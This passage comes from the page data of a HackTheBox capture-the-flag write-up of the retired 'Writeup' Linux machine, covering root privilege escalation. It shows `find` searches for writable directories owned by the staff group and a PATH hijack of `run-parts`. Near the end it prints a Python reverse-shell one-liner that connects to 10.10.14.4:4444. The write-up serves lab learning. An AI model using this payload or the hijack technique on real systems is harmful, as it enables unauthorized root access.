punctuation\">)</span> <span class=\"token assign-left variable\">groups</span><span class=\"token 
operator\">=</span><span class=\"token number\">1000</span><span class=\"token punctuation\">(</span>jkr<span class=\"token punctuation\">)</span>,24<span class=\"token punctuation\">(</span>cdrom<span class=\"token punctuation\">)</span>,25<span class=\"token punctuation\">(</span>floppy<span class=\"token punctuation\">)</span>,29<span class=\"token punctuation\">(</span>audio<span class=\"token punctuation\">)</span>,30<span class=\"token punctuation\">(</span>dip<span class=\"token punctuation\">)</span>,44<span class=\"token punctuation\">(</span>video<span class=\"token punctuation\">)</span>,46<span class=\"token punctuation\">(</span>plugdev<span class=\"token punctuation\">)</span>,50<span class=\"token punctuation\">(</span>staff<span class=\"token punctuation\">)</span>,103<span class=\"token punctuation\">(</span>netdev<span class=\"token punctuation\">)</span></code></pre></div>\n<p>Based on that result, I used the <code class=\"language-text\">find</code> command to look for writable targets owned by root whose group matched some of the groups that seemed interesting.</p>\n<div class=\"gatsby-highlight\" data-language=\"bash\"><pre class=\"language-bash\"><code class=\"language-bash\">$ <span class=\"token function\">find</span> / -user root -group jkr -ls -writable <span class=\"token operator\"><span class=\"token file-descriptor important\">2</span>></span>/dev/null\n$ <span class=\"token function\">find</span> / -user root -group staff -ls -writable <span class=\"token operator\"><span class=\"token file-descriptor important\">2</span>></span>/dev/null\n      <span class=\"token number\">189</span>      <span class=\"token number\">4</span> drwxrwsr-x   <span class=\"token number\">2</span> root     staff        <span class=\"token number\">4096</span> Jun  <span class=\"token number\">3</span>  <span class=\"token number\">2018</span> /var/local\n   <span class=\"token number\">131445</span>     <span class=\"token number\">20</span> drwx-wsr-x   
<span class=\"token number\">2</span> root     staff       <span class=\"token number\">20480</span> Apr <span class=\"token number\">19</span>  <span class=\"token number\">2019</span> /usr/local/bin</code></pre></div>\n<p>The linpeas output also showed that <code class=\"language-text\">/usr/local/bin</code> had been added to <code class=\"language-text\">PATH</code>.</p>\n<p><span\n      class=\"gatsby-resp-image-wrapper\"\n      style=\"position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 935px; \"\n    >\n      <a\n    class=\"gatsby-resp-image-link\"\n    href=\"/static/e261019dc55192bfcb580d5bc8b1881a/eb390/image-20220811194949646.png\"\n    style=\"display: block\"\n    target=\"_blank\"\n    rel=\"noopener\"\n  >\n    <span\n    class=\"gatsby-resp-image-background-image\"\n    style=\"padding-bottom: 11.249999999999998%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAACCAYAAABYBvyLAAAACXBIWXMAAAsTAAALEwEAmpwYAAAAlElEQVQI1yXIuwqCYACAUV9ESTOv6a95K1qKMjREKNBcoqCwUVx7gt76K2g4y5EORUTTrdmUK8xFhhfHHOuU5pJyPqWEWYKfLfGSCEOEyLOAiRVgBwLHUdF1BVlWUJQ/qS7n3DtBsfPJty5jL/i8Ba+bT1v77DcuQx8yPl3aykTVTJLIpr9aDA+HKv/d1MC2TDRN4wvzNUMRBmIqSgAAAABJRU5ErkJggg=='); background-size: cover; display: block;\"\n  ></span>\n  <picture>\n          <source\n              srcset=\"/static/e261019dc55192bfcb580d5bc8b1881a/8ac56/image-20220811194949646.webp 240w,\n/static/e261019dc55192bfcb580d5bc8b1881a/d3be9/image-20220811194949646.webp 480w,\n/static/e261019dc55192bfcb580d5bc8b1881a/c7dd1/image-20220811194949646.webp 935w\"\n              sizes=\"(max-width: 935px) 100vw, 935px\"\n              type=\"image/webp\"\n            />\n          <source\n            srcset=\"/static/e261019dc55192bfcb580d5bc8b1881a/8ff5a/image-20220811194949646.png 240w,\n/static/e261019dc55192bfcb580d5bc8b1881a/e85cb/image-20220811194949646.png 
480w,\n/static/e261019dc55192bfcb580d5bc8b1881a/eb390/image-20220811194949646.png 935w\"\n            sizes=\"(max-width: 935px) 100vw, 935px\"\n            type=\"image/png\"\n          />\n          <img\n            class=\"gatsby-resp-image-image\"\n            src=\"/static/e261019dc55192bfcb580d5bc8b1881a/eb390/image-20220811194949646.png\"\n            alt=\"image-20220811194949646\"\n            title=\"image-20220811194949646\"\n            loading=\"lazy\"\n            style=\"width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;\"\n          />\n        </picture>\n  </a>\n    </span></p>\n<p>However, even looking at the pspy output, most commands specified binaries under <code class=\"language-text\">/usr/bin</code> and elsewhere using full paths.</p>\n<p>The only exception seemed to be <code class=\"language-text\">run-parts --lsbsysinit /etc/update-motd.d</code>, which was executed without a path when logging in over SSH.</p>\n<div class=\"gatsby-highlight\" data-language=\"bash\"><pre class=\"language-bash\"><code class=\"language-bash\">$ <span class=\"token function\">sh</span> -c /usr/bin/env -i <span class=\"token assign-left variable\"><span class=\"token environment constant\">PATH</span></span><span class=\"token operator\">=</span>/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin run-parts --lsbsysinit /etc/update-motd.d <span class=\"token operator\">></span> /run/motd.dynamic.new</code></pre></div>\n<p>Because <code class=\"language-text\">PATH</code> included <code class=\"language-text\">/usr/local/bin</code>, I thought I should be able to execute arbitrary commands by writing a file containing my command there.</p>\n<p><span\n      class=\"gatsby-resp-image-wrapper\"\n      style=\"position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 625px; \"\n    >\n      <a\n    class=\"gatsby-resp-image-link\"\n    
href=\"/static/34d3c66b27e846abad088d48e687a0cb/80d71/image-20220811200245367.png\"\n    style=\"display: block\"\n    target=\"_blank\"\n    rel=\"noopener\"\n  >\n    <span\n    class=\"gatsby-resp-image-background-image\"\n    style=\"padding-bottom: 17.083333333333332%; position: relative; bottom: 0; left: 0; background-size: cover; display: block;\"\n  ></span>\n  <picture>\n          <source\n              srcset=\"/static/34d3c66b27e846abad088d48e687a0cb/8ac56/image-20220811200245367.webp 240w,\n/static/34d3c66b27e846abad088d48e687a0cb/d3be9/image-20220811200245367.webp 480w,\n/static/34d3c66b27e846abad088d48e687a0cb/487e2/image-20220811200245367.webp 625w\"\n              sizes=\"(max-width: 625px) 100vw, 625px\"\n              type=\"image/webp\"\n            />\n          <source\n            srcset=\"/static/34d3c66b27e846abad088d48e687a0cb/8ff5a/image-20220811200245367.png 240w,\n/static/34d3c66b27e846abad088d48e687a0cb/e85cb/image-20220811200245367.png 480w,\n/static/34d3c66b27e846abad088d48e687a0cb/80d71/image-20220811200245367.png 625w\"\n            sizes=\"(max-width: 625px) 100vw, 625px\"\n            type=\"image/png\"\n          />\n          <img\n            class=\"gatsby-resp-image-image\"\n            src=\"/static/34d3c66b27e846abad088d48e687a0cb/80d71/image-20220811200245367.png\"\n            alt=\"image-20220811200245367\"\n            title=\"image-20220811200245367\"\n            loading=\"lazy\"\n            style=\"width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;\"\n          />\n        </picture>\n  </a>\n    
</span></p>\n<p>Normally on Linux, the earlier entries in <code class=\"language-text\">PATH</code> take precedence.</p>\n<p>However, for some reason, as long as <code class=\"language-text\">/usr/bin</code> was present in <code class=\"language-text\">PATH</code>, even placing <code class=\"language-text\">run-parts</code> in <code class=\"language-text\">/usr/local/bin</code> did not make it execute first.</p>\n<p>After checking various things, it turned out that when the following periodically executed task ran, the module I had placed in <code class=\"language-text\">/usr/local/bin</code> was deleted.</p>\n<div class=\"gatsby-highlight\" data-language=\"bash\"><pre class=\"language-bash\"><code class=\"language-bash\">$ /bin/sh -c /root/bin/cleanup.pl <span class=\"token operator\">></span>/dev/null <span class=\"token operator\"><span class=\"token file-descriptor important\">2</span>></span><span class=\"token file-descriptor important\">&amp;1</span></code></pre></div>\n<p>That seems to be why it did not run as expected.</p>\n<p>So I overwrote <code class=\"language-text\">run-parts</code> with the following command, then immediately made an SSH connection from another terminal, which gave me a root shell.</p>\n<div class=\"gatsby-highlight\" data-language=\"bash\"><pre class=\"language-bash\"><code class=\"language-bash\">$ <span class=\"token builtin class-name\">echo</span> <span class=\"token string\">\"python -c 'import socket,os,pty;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect<span class=\"token variable\"><span class=\"token punctuation\">((</span>\\\"<span class=\"token number\">10.10</span><span class=\"token number\">.14</span><span class=\"token number\">.4</span>\\\"<span class=\"token punctuation\">,</span><span class=\"token number\">4444</span><span class=\"token punctuation\">))</span></span>;os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn(<span class=\"token entity\" 
title=\"\\&quot;\">\\\"</span>/bin/sh<span class=\"token entity\" title=\"\\&quot;\">\\\"</span>)'\"</span> <span class=\"token operator\">></span> /usr/local/sbin/run-parts<span class=\"token punctuation\">;</span> <span class=\"token function\">chmod</span> +x /usr/local/sbin/run-parts</code></pre></div>\n<h2 id=\"summary\" style=\"position:relative;\"><a href=\"#summary\" aria-label=\"summary permalink\" class=\"anchor before\"><svg aria-hidden=\"true\" focusable=\"false\" height=\"16\" version=\"1.1\" viewBox=\"0 0 16 16\" width=\"16\"><path fill-rule=\"evenodd\" d=\"M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z\"></path></svg></a>Summary</h2>\n<p>I think this machine had a lot to teach.</p>\n<p>It was especially educational regarding group and user permissions, which I had previously been handling more by intuition than understanding.</p>","fields":{"slug":"/hackthebox-linux-writeup-en","tagSlugs":["/tag/hack-the-box-en/","/tag/linux-en/","/tag/easy-box-en/","/tag/english/"]},"frontmatter":{"date":"2022-08-10","description":"A writeup of the retired HackTheBox machine \"Writeup\".","tags":["HackTheBox (en)","Linux (en)","EasyBox (en)","English"],"title":"HackTheBox Writeup: Writeup (Easy/Linux)","socialImage":{"publicURL":"/static/dc4d8b7f8795f3c3d3489d9957d155f2/no-image.png"}}}},"pageContext":{"slug":"/hackthebox-linux-writeup-en"}},"staticQueryHashes":["251939775","401334301","825871152"]}